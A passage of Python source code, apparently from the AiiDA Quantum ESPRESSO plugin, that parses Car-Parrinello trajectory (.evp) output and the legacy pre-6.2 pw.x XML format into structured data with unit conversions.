                raw_trajectory['enthalpy'] = matrix[:, 5] * CONSTANTS.hartree_to_ev  # ENTHAL, eV
                raw_trajectory['enthalpy_plus_kinetic'] = matrix[:, 6] * CONSTANTS.hartree_to_ev  # ECONS, eV
                raw_trajectory['energy_constant_motion'] = matrix[:, 7] * CONSTANTS.hartree_to_ev  # ECONT, eV
                raw_trajectory['volume'] = matrix[:, 8] * (CONSTANTS.bohr_to_ang**3)  # volume, angstrom^3
                raw_trajectory['pressure'] = matrix[:, 9]  # out_press, GPa
                raw_trajectory['evp_times'] = matrix[:, 10]  # TPS, ps

            # Heuristics to understand if it's correct.
            # A better heuristics could also try to fix possible issues
            # (in new versions of QE, it's possible to recompile it with
            # the __OLD_FORMAT flag to get back the old version format...)
            # but I won't do it, as there may be also other columns swapped.
            # Better to stop and ask the user to check what's going on.
            max_time_difference = abs(numpy.array(raw_trajectory['times']) -
                                      numpy.array(raw_trajectory['evp_times'])).max()
            if max_time_difference > 1.e-4:  # It is typically ~1.e-7 due to roundoff errors
                # If there is a large discrepancy
                # it means there is something very weird going on...
                return self.exit(self.exit_codes.ERROR_READING_TRAJECTORY_DATA)

            # Delete evp_times in any case, it's a duplicate of 'times'
            del raw_trajectory['evp_times']
        except IOError:
            out_dict['warnings'].append('Unable to open the EVP file... skipping.')

        # get the symbols from the input
        # TODO: I should have kinds in TrajectoryData
        input_structure = self.node.inputs.structure
        raw_trajectory['symbols'] = [str(i.kind_name) for i in input_structure.sites]

        traj = TrajectoryData()
        traj.set_trajectory(
            stepids=raw_trajectory['steps'],
            cells=raw_trajectory['cells'],
            symbols=raw_trajectory['symbols'],
            positions=raw_trajectory['positions_ordered'],
            times=raw_trajectory['times'],
            velocities=raw_trajectory['velocities_ordered'],
        )

        # attach the scalar per-step quantities that were actually parsed from the .evp file
        for this_name in evp_keys:
            try:
                traj.set_array(this_name, raw_trajectory[this_name])
            except KeyError:
                # Some columns may have not been parsed, skip
                pass

        self.out('output_trajectory', traj)

        # Remove big dictionaries that would be redundant
        # For atoms and cell, there is a small possibility that nothing is parsed
        # but then probably nothing moved.
        try:
            del out_dict['atoms']
        except KeyError:
            pass
        try:
            del out_dict['cell']
        except KeyError:
            pass
        try:
            del out_dict['ions_positions_stau']
        except KeyError:
            pass
        try:
            del out_dict['ions_positions_svel']
        except KeyError:
            pass
        try:
            del out_dict['ions_positions_taui']
        except KeyError:
            pass
        # This should not be needed
        try:
            del out_dict['atoms_index_list']
        except KeyError:
            pass
        # This should be already in the input
        try:
            del out_dict['atoms_if_pos_list']
        except KeyError:
            pass
        #
        try:
            del out_dict['ions_positions_force']
        except KeyError:
            pass

        # convert the dictionary into an AiiDA object
        output_params = Dict(dict=out_dict)
        self.out('output_parameters', output_params)

    def get_linkname_trajectory(self):
        """Returns the name of the link to the output_structure (None if not present)"""
        return 'output_trajectory'

    def _generate_sites_ordering(self, raw_species, raw_atoms):
        """take the positions of xml and from file.pos of the LAST step and compare them.

        Returns the inverse permutation that maps the species-grouped order used in the
        CP output files back to the site order of the input structure.
        """
        # Examples in the comments are for species [Ba, O, Ti]
        # and atoms [Ba, Ti, O, O, O]

        # Dictionary to associate the species name to the idx
        # Example: {'Ba': 1, 'O': 2, 'Ti': 3}
        species_dict = {name: idx for idx, name in zip(raw_species['index'], raw_species['type'])}
        # List of the indices of the specie associated to each atom,
        # in the order specified in input
        # Example: (1,3,2,2,2)
        atoms_species_idx = [species_dict[a[0]] for a in raw_atoms]
        # I also attach the current position; important to convert to a list
        # Otherwise the iterator can be looped on only once!
        # Example: ((0,1),(1,3),(2,2),(3,2),(4,2))
        ref_atom_list = list(enumerate(atoms_species_idx))
        new_order_tmp = []
        # I reorder the atoms, first by specie, then in their order
        # This is the order used in output by CP!!
        # Example: ((0,1),(2,2),(3,2),(4,2),(1,3))
        for specie_idx in sorted(raw_species['index']):
            for elem in ref_atom_list:
                if elem[1] == specie_idx:
                    new_order_tmp.append(elem)
        # This is the new order that is printed in CP:
        # e.g. reordering[2] is the index of the atom, in the input
        # list of atoms, that is printed in position 2 (0-based, so the
        # third atom) in the CP output files.
        # Example: [0,2,3,4,1]
        reordering = [_[0] for _ in new_order_tmp]
        # I now need the inverse reordering, to put back in place
        # from the output ordering to the input one!
        # Example: [0,4,1,2,3]
        # Because in the final list (Ba, O, O, O, Ti)
        # the first atom Ba in the input is atom 0 in the CP output (the first),
        # the second atom Ti in the input is atom 4 (the fifth) in the CP output,
        # and so on
        sorted_indexed_reordering = sorted([(_[1], _[0]) for _ in enumerate(reordering)])
        reordering_inverse = [_[1] for _ in sorted_indexed_reordering]
        return reordering_inverse

    def _get_reordered_list(self, origlist, reordering):
        """Given a list to reorder, a list of integer positions with the new order, return the reordered list."""
        return [origlist[e] for e in reordering]

    def _get_reordered_array(self, _input, reordering):
        # apply the same row reordering to every frame of the trajectory array
        return numpy.array([self._get_reordered_list(i, reordering) for i in _input])
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
"""Code that was written to parse the legacy XML format of Quantum ESPRESSO, which was deprecated in version 6.4."""
import os
import string
from xml.dom.minidom import parse, parseString, Element
from aiida_quantumespresso.parsers import QEOutputParsingError
from aiida_quantumespresso.utils.mapping import get_logging_container
from qe_tools import CONSTANTS
# Suffix appended to a parsed key to store the units of that quantity
units_suffix = '_units'
# Default units used for the quantities returned by this parser
default_energy_units = 'eV'
default_k_points_units = '1 / angstrom'
default_length_units = 'Angstrom'
def parse_pw_xml_pre_6_2(xml_file, dir_with_bands):
    """Parse the content of XML output file written by `pw.x` with the old schema-less XML format.

    The file is processed card by card (CELL, IONS, HEADER, CONTROL, ELECTRIC_FIELD,
    PLANE_WAVES, SPIN, BRILLOUIN_ZONE, BAND_STRUCTURE_INFO, MAGNETIZATION_INIT,
    OCCUPATIONS, CHARGE-DENSITY, EIGENVALUES, symmetries, EXCHANGE_CORRELATION).

    :param xml_file: filelike object to the XML output file
    :param dir_with_bands: absolute filepath to directory containing k-point XML files
    :returns: tuple of two dictionaries, with the parsed data and log messages, respectively
    """
    import copy
    from xml.parsers.expat import ExpatError

    logs = get_logging_container()

    # NOTE : I often assume that if the xml file has been written, it has no internal errors.
    try:
        dom = parse(xml_file)
    except ExpatError:
        # malformed XML: return empty structures together with the error log
        logs.error.append('Error in XML parseString: bad format')
        parsed = {
            'bands': {},
            'structure': {},
        }
        return parsed, logs

    parsed_data = {}
    structure_dict = {}

    # CARD CELL
    structure_dict, lattice_vectors, volume = copy.deepcopy(xml_card_cell(structure_dict, dom))

    # CARD IONS
    structure_dict = copy.deepcopy(xml_card_ions(structure_dict, dom, lattice_vectors, volume))

    #CARD HEADER
    parsed_data = copy.deepcopy(xml_card_header(parsed_data, dom))

    # CARD CONTROL
    cardname = 'CONTROL'
    target_tags = read_xml_card(dom, cardname)
    for tagname in ['PP_CHECK_FLAG', 'LKPOINT_DIR', 'Q_REAL_SPACE', 'BETA_REAL_SPACE']:
        parsed_data[tagname.lower()] = parse_xml_child_bool(tagname, target_tags)

    # TODO: why this one isn't working? What is it actually?
    # # CARD MOVING_CELL
    #
    # try:
    #     target_tags = dom.getElementsByTagName('MOVING_CELL')[0]
    # except:
    #     raise IOError
    #
    # tagname='CELL_FACTOR'
    # parsed_data[tagname.lower()]=parse_xml_child_float(tagname,target_tags)

    # CARD ELECTRIC_FIELD
    cardname = 'ELECTRIC_FIELD'
    target_tags = read_xml_card(dom, cardname)
    for tagname in ['HAS_ELECTRIC_FIELD', 'HAS_DIPOLE_CORRECTION']:
        parsed_data[tagname.lower()] = parse_xml_child_bool(tagname, target_tags)
    # field parameters are only present when a field or dipole correction is active
    if parsed_data['has_electric_field'] or parsed_data['has_dipole_correction']:
        tagname = 'FIELD_DIRECTION'
        parsed_data[tagname.lower()] = parse_xml_child_integer(tagname, target_tags)
        for tagname in ['MAXIMUM_POSITION', 'INVERSE_REGION', 'FIELD_AMPLITUDE']:
            parsed_data[tagname.lower()] = parse_xml_child_float(tagname, target_tags)

    # CARD PLANE_WAVES
    parsed_data = copy.deepcopy(xml_card_planewaves(parsed_data, dom, 'pw'))

    # CARD SPIN
    parsed_data = copy.deepcopy(xml_card_spin(parsed_data, dom))

    # CARD BRILLOUIN ZONE
    cardname = 'BRILLOUIN_ZONE'
    target_tags = read_xml_card(dom, cardname)
    tagname = 'NUMBER_OF_K-POINTS'
    parsed_data[tagname.replace('-', '_').lower()] = parse_xml_child_integer(tagname, target_tags)
    tagname = 'UNITS_FOR_K-POINTS'
    attrname = 'UNITS'
    metric = parse_xml_child_attribute_str(tagname, attrname, target_tags)
    if metric not in ['2 pi / a']:
        raise QEOutputParsingError('Error parsing attribute {},'.format(attrname) + \
                                   ' tag {} inside {}, units unknown'.format(tagname, target_tags.tagName) )
    k_points_units = metric
    for tagname, param in [['MONKHORST_PACK_GRID', 'nk'], ['MONKHORST_PACK_OFFSET', 'k']]:
        try:
            #a = target_tags.getElementsByTagName(tagname)[0]
            a = [_ for _ in target_tags.childNodes if _.nodeName == tagname][0]
            value = [int(a.getAttribute(param + str(i + 1))) for i in range(3)]
            parsed_data[tagname.replace('-', '_').lower()] = value
        except Exception:  # I might not use the monkhorst pack grid
            pass
    kpoints = []
    kpoints_weights = []
    tagname_prefix = 'K-POINT.'
    # pre-index the K-POINT.<n> children by name to avoid repeated linear scans
    a_dict = {_.nodeName: _ for _ in target_tags.childNodes if _.nodeName.startswith(tagname_prefix)}
    try:
        import numpy
        for i in range(parsed_data['number_of_k_points']):
            tagname = '{}{}'.format(tagname_prefix, i + 1)
            #a = target_tags.getElementsByTagName(tagname)[0]
            a = a_dict[tagname]
            b = a.getAttribute('XYZ').replace('\n', '').rsplit()
            value = [float(s) for s in b]
            metric = k_points_units
            if metric == '2 pi / a':
                # convert from 2 pi / a units to 1 / angstrom
                value = [2. * numpy.pi * float(s) / structure_dict['lattice_parameter'] for s in value]
            weight = float(a.getAttribute('WEIGHT'))
            kpoints.append(value)
            kpoints_weights.append(weight)
        parsed_data['k_points'] = kpoints
        parsed_data['k_points' + units_suffix] = default_k_points_units
        parsed_data['k_points_weights'] = kpoints_weights
    except Exception:
        raise QEOutputParsingError('Error parsing tag K-POINT.{} inside {}.'.format(i + 1, target_tags.tagName))

    # I skip this card until someone will have a need for this.
    # try:
    #     tagname='STARTING_K-POINTS'
    #     num_starting_k_points=parse_xml_child_integer(tagname,target_tags)
    #     # raise exception if there is no such a key
    #     parsed_data[tagname.replace('-','_').lower()]=num_starting_k_points
    #
    #     if parsed_data.get('starting_k_points'):
    #         try:
    #             kpoints=[]
    #             for i in range(parsed_data['starting_k_points']):
    #                 tagname='K-POINT_START.'+str(i+1)
    #                 a=target_tags.getElementsByTagName(tagname)[0]
    #                 b=a.getAttribute('XYZ').replace('\n','').rsplit()
    #                 value=[ float(s) for s in b ]
    #                 metric=parsed_data['k_points_units']
    #                 if metric=='2 pi / a':
    #                     value=[ float(s)/parsed_data['lattice_parameter'] for s in value ]
    #
    #                 weight=float(a.getAttribute('WEIGHT'))
    #
    #                 kpoints.append([value,weight])
    #
    #             parsed_data['k_point_start']=kpoints
    #         except Exception:
    #             raise QEOutputParsingError('Error parsing tag {}'.format(tagname)+\
    #                                        ' inside {}.'.format(target_tags.tagName ) )
    # except Exception:
    #     if not parsed_data.get('starting_k_points'):
    #         pass
    #     else:
    #         parsed_data['xml_warnings'].append("Warning: could not parse {}".format(tagname))

    # tagname='NORM-OF-Q'
    # TODO: decide if save this parameter
    # parsed_data[tagname.replace('-','_').lower()]=parse_xml_child_float(tagname,target_tags)

    # CARD BAND STRUCTURE INFO
    cardname = 'BAND_STRUCTURE_INFO'
    target_tags = read_xml_card(dom, cardname)
    for tagname in ['NUMBER_OF_SPIN_COMPONENTS', 'NUMBER_OF_ATOMIC_WFC', 'NUMBER_OF_BANDS']:
        parsed_data[tagname.replace('-','_').lower()] = \
            parse_xml_child_integer(tagname,target_tags)
    tagname = 'NON-COLINEAR_CALCULATION'
    parsed_data[tagname.replace('-','_').lower()] = \
        parse_xml_child_bool(tagname,target_tags)
    tagname = 'NUMBER_OF_ELECTRONS'
    parsed_data[tagname.replace('-','_').lower()] = \
        parse_xml_child_float(tagname,target_tags)
    tagname = 'UNITS_FOR_ENERGIES'
    attrname = 'UNITS'
    units = parse_xml_child_attribute_str(tagname, attrname, target_tags)
    if units not in ['hartree']:
        raise QEOutputParsingError(
            'Expected energy units in Hartree. Got instead {}'.format(parsed_data['energy_units'])
        )
    try:
        tagname = 'TWO_FERMI_ENERGIES'
        parsed_data[tagname.lower()] = parse_xml_child_bool(tagname, target_tags)
    except Exception:
        pass
    # spin-polarized calculations may print separate up/down Fermi energies
    if parsed_data.get('two_fermi_energies', False):
        tagname = 'FERMI_ENERGY_UP'
        parsed_data[tagname.replace('-','_').lower()] = \
            parse_xml_child_float(tagname,target_tags) * CONSTANTS.hartree_to_ev
        parsed_data[tagname.lower() + units_suffix] = default_energy_units
        tagname = 'FERMI_ENERGY_DOWN'
        parsed_data[tagname.replace('-','_').lower()] = \
            parse_xml_child_float(tagname,target_tags) * CONSTANTS.hartree_to_ev
        parsed_data[tagname.lower() + units_suffix] = default_energy_units
    else:
        tagname = 'FERMI_ENERGY'
        parsed_data[tagname.replace('-','_').lower()] = \
            parse_xml_child_float(tagname,target_tags) * CONSTANTS.hartree_to_ev
        parsed_data[tagname.lower() + units_suffix] = default_energy_units

    #CARD MAGNETIZATION_INIT
    cardname = 'MAGNETIZATION_INIT'
    target_tags = read_xml_card(dom, cardname)
    # 0 if false
    tagname = 'CONSTRAINT_MAG'
    parsed_data[tagname.lower()] = parse_xml_child_integer(tagname, target_tags)
    vec1 = []
    vec2 = []
    vec3 = []
    for i in range(structure_dict['number_of_species']):
        tagname = 'SPECIE.' + str(i + 1)
        #a=target_tags.getElementsByTagName(tagname)[0]
        a = [_ for _ in target_tags.childNodes if _.nodeName == tagname][0]
        tagname2 = 'STARTING_MAGNETIZATION'
        vec1.append(parse_xml_child_float(tagname2, a))
        tagname2 = 'ANGLE1'
        vec2.append(parse_xml_child_float(tagname2, a))
        tagname2 = 'ANGLE2'
        vec3.append(parse_xml_child_float(tagname2, a))
    parsed_data['starting_magnetization'] = vec1
    parsed_data['magnetization_angle1'] = vec2
    parsed_data['magnetization_angle2'] = vec3

    #CARD OCCUPATIONS
    cardname = 'OCCUPATIONS'
    target_tags = read_xml_card(dom, cardname)
    for tagname in ['SMEARING_METHOD', 'TETRAHEDRON_METHOD', 'FIXED_OCCUPATIONS']:
        parsed_data[tagname.lower()] = parse_xml_child_bool(tagname, target_tags)
    # collapse the three booleans into a single 'occupations' string
    if parsed_data['smearing_method']:
        parsed_data['occupations'] = 'smearing'
    elif parsed_data['tetrahedron_method']:
        parsed_data['occupations'] = 'tetrahedra'  # TODO: might also be tetrahedra_lin or tetrahedra_opt: check input?
    elif parsed_data['fixed_occupations']:
        parsed_data['occupations'] = 'fixed'
    # Remove the following deprecated keys
    for tagname in ['SMEARING_METHOD', 'TETRAHEDRON_METHOD', 'FIXED_OCCUPATIONS']:
        parsed_data.pop(tagname.lower())

    #CARD CHARGE-DENSITY
    cardname = 'CHARGE-DENSITY'
    target_tags = read_xml_card(dom, cardname)
    try:
        attrname = 'iotk_link'
        value = str(target_tags.getAttribute(attrname)).rstrip().replace('\n', '').lower()
        parsed_data[cardname.lower().rstrip().replace('-', '_')] = value
    except Exception:
        raise QEOutputParsingError('Error parsing attribute {},'.format(attrname) + \
                                   ' card {}.'.format(cardname))

    #CARD EIGENVALUES
    # Note: if this card is parsed, the dimension of the database grows very much!
    cardname = 'EIGENVALUES'
    target_tags = read_xml_card(dom, cardname)
    bands_dict = {}
    if dir_with_bands:
        try:
            occupations1 = []
            occupations2 = []
            bands1 = []
            bands2 = []
            for i in range(parsed_data['number_of_k_points']):
                tagname = 'K-POINT.' + str(i + 1)
                #a=target_tags.getElementsByTagName(tagname)[0]
                a = [_ for _ in target_tags.childNodes if _.nodeName == tagname][0]

                def read_bands_and_occupations(eigenval_n):
                    # load the eigenval.xml file
                    with open(eigenval_n, 'r') as eigenval_f:
                        f = eigenval_f.read()
                    eig_dom = parseString(f)
                    tagname = 'UNITS_FOR_ENERGIES'
                    a = eig_dom.getElementsByTagName(tagname)[0]
                    attrname = 'UNITS'
                    metric = str(a.getAttribute(attrname))
                    if metric not in ['Hartree']:
                        raise QEOutputParsingError('Error parsing eigenvalues xml file, ' + \
                                                   'units {} not implemented.'.format(metric))
                    tagname = 'EIGENVALUES'
                    a = eig_dom.getElementsByTagName(tagname)[0]
                    b = a.childNodes[0]
                    value_e = [float(s) * CONSTANTS.hartree_to_ev for s in b.data.split()]
                    tagname = 'OCCUPATIONS'
                    a = eig_dom.getElementsByTagName(tagname)[0]
                    b = a.childNodes[0]
                    value_o = [float(s) for s in b.data.split()]
                    return value_e, value_o

                # two cases: in cases of magnetic calculations, I have both spins
                try:
                    tagname2 = 'DATAFILE'
                    b = a.getElementsByTagName(tagname2)[0]
                    attrname = 'iotk_link'
                    value = str(b.getAttribute(attrname)).rstrip().replace('\n', '')
                    eigenval_n = os.path.join(dir_with_bands, value)
                    value_e, value_o = read_bands_and_occupations(eigenval_n)
                    bands1.append(value_e)
                    occupations1.append(value_o)
                except IndexError:
                    # no single DATAFILE: spin-polarized case with one file per spin channel
                    tagname2 = 'DATAFILE.1'
                    b1 = a.getElementsByTagName(tagname2)[0]
                    tagname2 = 'DATAFILE.2'
                    b2 = a.getElementsByTagName(tagname2)[0]
                    attrname = 'iotk_link'
                    value1 = str(b1.getAttribute(attrname)).rstrip().replace('\n', '')
                    value2 = str(b2.getAttribute(attrname)).rstrip().replace('\n', '')
                    eigenval_n = os.path.join(dir_with_bands, value1)
                    value_e, value_o = read_bands_and_occupations(eigenval_n)
                    bands1.append(value_e)
                    occupations1.append(value_o)
                    eigenval_n = os.path.join(dir_with_bands, value2)
                    value_e, value_o = read_bands_and_occupations(eigenval_n)
                    bands2.append(value_e)
                    occupations2.append(value_o)
            occupations = [occupations1]
            bands = [bands1]
            if occupations2:
                occupations.append(occupations2)
            if bands2:
                bands.append(bands2)
            bands_dict['occupations'] = occupations
            bands_dict['bands'] = bands
            bands_dict['bands' + units_suffix] = default_energy_units
        except Exception as exception:
            raise QEOutputParsingError(
                'Error parsing card {}: {} {}'.format(tagname, exception.__class__.__name__, exception)
            )
    # if dir_with_bands:
    #     # if there is at least an empty band:
    #     if parsed_data['smearing_method'] or \
    #        parsed_data['number_of_electrons']/2. < parsed_data['number_of_bands']:
    #
    #         #TODO: currently I do it only for non magnetic systems
    #         if len(bands_dict['occupations'])==1:
    #             # initialize lumo
    #             lumo = parsed_data['homo']+10000.0
    #             for list_bands in bands_dict['bands']:
    #                 for value in list_bands:
    #                     if (value > parsed_data['fermi_energy']) and (value<lumo):
    #                         lumo=value
    #             if (lumo==parsed_data['homo']+10000.0) or lumo<=parsed_data['fermi_energy']:
    #                 #might be an error for bandgap larger than 10000 eV...
    #                 raise QEOutputParsingError('Error while searching for LUMO.')
    #             parsed_data['lumo']=lumo
    #             parsed_data['lumo'+units_suffix] = default_energy_units

    # CARD symmetries
    parsed_data = copy.deepcopy(xml_card_symmetries(parsed_data, dom))

    # CARD EXCHANGE_CORRELATION
    parsed_data = copy.deepcopy(xml_card_exchangecorrelation(parsed_data, dom))

    parsed_data['bands'] = bands_dict
    parsed_data['structure'] = structure_dict

    return parsed_data, logs
def cell_volume(a1, a2, a3):
    r"""
    returns the volume of the primitive cell: :math:`|\vec a_1\cdot(\vec a_2\cross \vec a_3)|`
    """
    # cross product a2 x a3, then scalar triple product with a1
    cross = (
        a2[1] * a3[2] - a2[2] * a3[1],
        a2[2] * a3[0] - a2[0] * a3[2],
        a2[0] * a3[1] - a2[1] * a3[0],
    )
    return abs(float(sum(x * y for x, y in zip(a1, cross))))
# In the following, some functions that helps the parsing of
# the xml file of QE v5.0.x (version below not tested)
def read_xml_card(dom, cardname):
    """Return the child element of the document's `Root` node whose tag is `cardname`.

    :param dom: minidom document of the legacy schema-less QE XML output
    :param cardname: tag name of the card to extract
    :raises QEOutputParsingError: if the `Root` node or the card cannot be found
    """
    try:
        root_node = [_ for _ in dom.childNodes if isinstance(_, Element) and _.nodeName == 'Root'][0]
        the_card = [_ for _ in root_node.childNodes if _.nodeName == cardname][0]
        #the_card = dom.getElementsByTagName(cardname)[0]
        return the_card
    except Exception as exception:
        # chain the original exception instead of printing it, so the failure cause
        # is preserved in the traceback rather than leaked to stdout
        raise QEOutputParsingError('Error parsing tag {}'.format(cardname)) from exception
def parse_xml_child_integer(tagname, target_tags):
    """Return the integer content of the first child of `target_tags` named `tagname`.

    :raises QEOutputParsingError: if the tag is missing or its content is not an integer
    """
    try:
        child = next(node for node in target_tags.childNodes if node.nodeName == tagname)
        return int(child.childNodes[0].data)
    except Exception:
        raise QEOutputParsingError('Error parsing tag {} inside {}'.format(tagname, target_tags.tagName))
def parse_xml_child_float(tagname, target_tags):
    """Return the float content of the first child of `target_tags` named `tagname`.

    :raises QEOutputParsingError: if the tag is missing or its content is not a float
    """
    try:
        child = next(node for node in target_tags.childNodes if node.nodeName == tagname)
        return float(child.childNodes[0].data)
    except Exception:
        raise QEOutputParsingError('Error parsing tag {} inside {}'\
                                   .format(tagname, target_tags.tagName ) )
def parse_xml_child_bool(tagname, target_tags):
    """Return the boolean content of the first child of `target_tags` named `tagname`.

    The textual content is converted through `str2bool`.

    :raises QEOutputParsingError: if the tag is missing or its content is not a recognized boolean
    """
    try:
        child = next(node for node in target_tags.childNodes if node.nodeName == tagname)
        return str2bool(child.childNodes[0].data)
    except Exception:
        raise QEOutputParsingError('Error parsing tag {} inside {}'\
                                   .format(tagname, target_tags.tagName) )
def str2bool(string):
    """Convert a string representation of a boolean into a ``bool``.

    Accepted values (case-insensitive, surrounding whitespace ignored) are
    't', '1', 'true', 'yes' for ``True`` and 'f', '0', 'false', 'no' for ``False``.

    :raises QEOutputParsingError: if the value is not a recognized boolean representation
        or is not string-like.
    """
    false_items = ['f', '0', 'false', 'no']
    true_items = ['t', '1', 'true', 'yes']
    # Guard only the normalization: previously the informative "Error converting
    # string {} to boolean value." raised below was itself caught by a blanket
    # `except Exception` and replaced by the generic message, hiding the value.
    try:
        normalized = str(string.lower().strip())
    except Exception:
        raise QEOutputParsingError('Error converting string to boolean.')
    if normalized in false_items:
        return False
    if normalized in true_items:
        return True
    raise QEOutputParsingError('Error converting string {} to boolean value.'.format(normalized))
def parse_xml_child_str(tagname, target_tags):
    """Return the text content of child element ``tagname`` of ``target_tags`` as a string.

    Trailing whitespace is stripped and embedded newlines are removed.

    :raises QEOutputParsingError: if the tag or its text content is missing.
    """
    try:
        matches = [node for node in target_tags.childNodes if node.nodeName == tagname]
        text_node = matches[0].childNodes[0]
        return str(text_node.data).rstrip().replace('\n', '')
    except Exception:
        raise QEOutputParsingError('Error parsing tag {} inside {}'.format(tagname, target_tags.tagName))
def parse_xml_child_attribute_str(tagname, attributename, target_tags):
    """Return attribute ``attributename`` of child element ``tagname`` as a lower-case string.

    Trailing whitespace is stripped and embedded newlines are removed.

    :raises QEOutputParsingError: if the tag or the attribute cannot be read.
    """
    try:
        matches = [node for node in target_tags.childNodes if node.nodeName == tagname]
        raw = str(matches[0].getAttribute(attributename))
        return raw.rstrip().replace('\n', '').lower()
    except Exception:
        raise QEOutputParsingError(
            'Error parsing attribute {}, tag {} inside {}'.format(attributename, tagname, target_tags.tagName)
        )
def parse_xml_child_attribute_int(tagname, attributename, target_tags):
    """Return attribute ``attributename`` of child element ``tagname`` as an ``int``.

    :raises QEOutputParsingError: if the tag or the attribute cannot be read as an integer.
    """
    try:
        matches = [node for node in target_tags.childNodes if node.nodeName == tagname]
        return int(matches[0].getAttribute(attributename))
    except Exception:
        raise QEOutputParsingError(
            'Error parsing attribute {}, tag {} inside {}'.format(attributename, tagname, target_tags.tagName)
        )
def convert_list_to_matrix(in_matrix, n_rows, n_columns):
    """Chop a flat list into a list of lists (a matrix-like structure).

    Produces ``n_columns`` consecutive chunks of ``n_rows`` elements each,
    i.e. exactly ``n_rows * n_columns`` input elements are consumed.
    """
    chunk_starts = range(0, n_rows * n_columns, n_rows)
    return [in_matrix[start:start + n_rows] for start in chunk_starts]
def xml_card_cell(parsed_data, dom):
    """Parse the CELL card of the QE XML output.

    Stores the cell correction scheme, Bravais lattice, lattice parameter,
    cell dimensions and the direct and reciprocal lattice vectors in
    ``parsed_data``. Lengths given in bohr are converted to angstrom.

    :param parsed_data: dictionary updated in place with the parsed values
    :param dom: XML DOM of the QE output file
    :return: tuple ``(parsed_data, lattice_vectors, volume)`` where
        ``lattice_vectors`` holds the direct lattice vectors (in angstrom)
        and ``volume`` is the cell volume computed from them
    :raises QEOutputParsingError: if a tag is missing or units are unsupported
    """
    #CARD CELL of QE output
    cardname = 'CELL'
    target_tags = read_xml_card(dom, cardname)
    for tagname in ['NON-PERIODIC_CELL_CORRECTION', 'BRAVAIS_LATTICE']:
        parsed_data[tagname.replace('-', '_').lower()] = parse_xml_child_str(tagname, target_tags)
    tagname = 'LATTICE_PARAMETER'
    value = parse_xml_child_float(tagname, target_tags)
    # The raw value (in whatever units QE wrote) is kept under the '_xml' key;
    # the plain key below holds the value converted to angstrom.
    parsed_data[tagname.replace('-', '_').lower() + '_xml'] = value
    attrname = 'UNITS'
    metric = parse_xml_child_attribute_str(tagname, attrname, target_tags)
    if metric not in ['bohr', 'angstrom']:
        raise QEOutputParsingError(
            'Error parsing attribute {}, tag {} inside {}, units not found'.format(
                attrname, tagname, target_tags.tagName
            )
        )
    if metric == 'bohr':
        value *= CONSTANTS.bohr_to_ang
    parsed_data[tagname.replace('-', '_').lower()] = value
    tagname = 'CELL_DIMENSIONS'
    try:
        #a=target_tags.getElementsByTagName(tagname)[0]
        a = [_ for _ in target_tags.childNodes if _.nodeName == tagname][0]
        b = a.childNodes[0]
        c = b.data.replace('\n', '').split()
        value = [float(i) for i in c]
        parsed_data[tagname.replace('-', '_').lower()] = value
    except Exception:
        raise QEOutputParsingError('Error parsing tag {} inside {}.'.format(tagname, target_tags.tagName))
    tagname = 'DIRECT_LATTICE_VECTORS'
    lattice_vectors = []
    try:
        second_tagname = 'UNITS_FOR_DIRECT_LATTICE_VECTORS'
        #a=target_tags.getElementsByTagName(tagname)[0]
        a = [_ for _ in target_tags.childNodes if _.nodeName == tagname][0]
        b = a.getElementsByTagName('UNITS_FOR_DIRECT_LATTICE_VECTORS')[0]
        value = str(b.getAttribute('UNITS')).lower()
        parsed_data[second_tagname.replace('-', '_').lower()] = value
        metric = value
        if metric not in ['bohr', 'angstroms']:  # REMEMBER TO CHECK THE UNITS AT THE END OF THE FUNCTION
            raise QEOutputParsingError(
                'Error parsing tag {} inside {}: units not supported: {}'.format(tagname, target_tags.tagName, metric)
            )
        lattice_vectors = []
        # The three direct lattice vectors a1, a2, a3, converted to angstrom.
        for second_tagname in ['a1', 'a2', 'a3']:
            #b = a.getElementsByTagName(second_tagname)[0]
            b = [_ for _ in a.childNodes if _.nodeName == second_tagname][0]
            c = b.childNodes[0]
            d = c.data.replace('\n', '').split()
            value = [float(i) for i in d]
            if metric == 'bohr':
                value = [CONSTANTS.bohr_to_ang * float(s) for s in value]
            lattice_vectors.append(value)
        volume = cell_volume(lattice_vectors[0], lattice_vectors[1], lattice_vectors[2])
    except Exception:
        raise QEOutputParsingError(
            'Error parsing tag {} inside {} inside {}.'.format(tagname, target_tags.tagName, cardname)
        )
    # NOTE: lattice_vectors will be saved later together with card IONS.atom
    tagname = 'RECIPROCAL_LATTICE_VECTORS'
    try:
        #a = target_tags.getElementsByTagName(tagname)[0]
        a = [_ for _ in target_tags.childNodes if _.nodeName == tagname][0]
        second_tagname = 'UNITS_FOR_RECIPROCAL_LATTICE_VECTORS'
        b = a.getElementsByTagName(second_tagname)[0]
        value = str(b.getAttribute('UNITS')).lower()
        parsed_data[second_tagname.replace('-', '_').lower()] = value
        metric = value
        # NOTE: output is given in 2 pi / a [ang ^ -1]
        if metric not in ['2 pi / a']:
            raise QEOutputParsingError(
                'Error parsing tag {} inside {}: units {} not supported'.format(tagname, target_tags.tagName, metric)
            )
        # reciprocal_lattice_vectors
        this_matrix = []
        for second_tagname in ['b1', 'b2', 'b3']:
            b = a.getElementsByTagName(second_tagname)[0]
            c = b.childNodes[0]
            d = c.data.replace('\n', '').split()
            value = [float(i) for i in d]
            if metric == '2 pi / a':
                # Rescale from 2*pi/a units using the lattice parameter parsed above.
                value = [float(s) / parsed_data['lattice_parameter'] for s in value]
            this_matrix.append(value)
        parsed_data['reciprocal_lattice_vectors'] = this_matrix
    except Exception:
        raise QEOutputParsingError('Error parsing tag {} inside {}.'.format(tagname, target_tags.tagName))
    return parsed_data, lattice_vectors, volume
def xml_card_ions(parsed_data, dom, lattice_vectors, volume):
    """Parse the IONS card of the QE XML output.

    Reads the atomic species (type, mass, pseudopotential file) and the atomic
    positions. Positions given in 'alat' or 'bohr' are rescaled; the atoms are
    stored both directly in ``parsed_data`` and, together with
    ``lattice_vectors`` and ``volume`` from the CELL card, in
    ``parsed_data['cell']`` for better compatibility with ASE.

    :param parsed_data: dictionary updated in place with the parsed values
    :param dom: XML DOM of the QE output file
    :param lattice_vectors: direct lattice vectors as parsed from the CELL card
    :param volume: cell volume as computed from the CELL card
    :return: the updated ``parsed_data`` dictionary
    :raises QEOutputParsingError: if a SPECIE.# or ATOM.# tag cannot be parsed
    """
    cardname = 'IONS'
    target_tags = read_xml_card(dom, cardname)
    for tagname in ['NUMBER_OF_ATOMS', 'NUMBER_OF_SPECIES']:
        parsed_data[tagname.lower()] = parse_xml_child_integer(tagname, target_tags)
    tagname = 'UNITS_FOR_ATOMIC_MASSES'
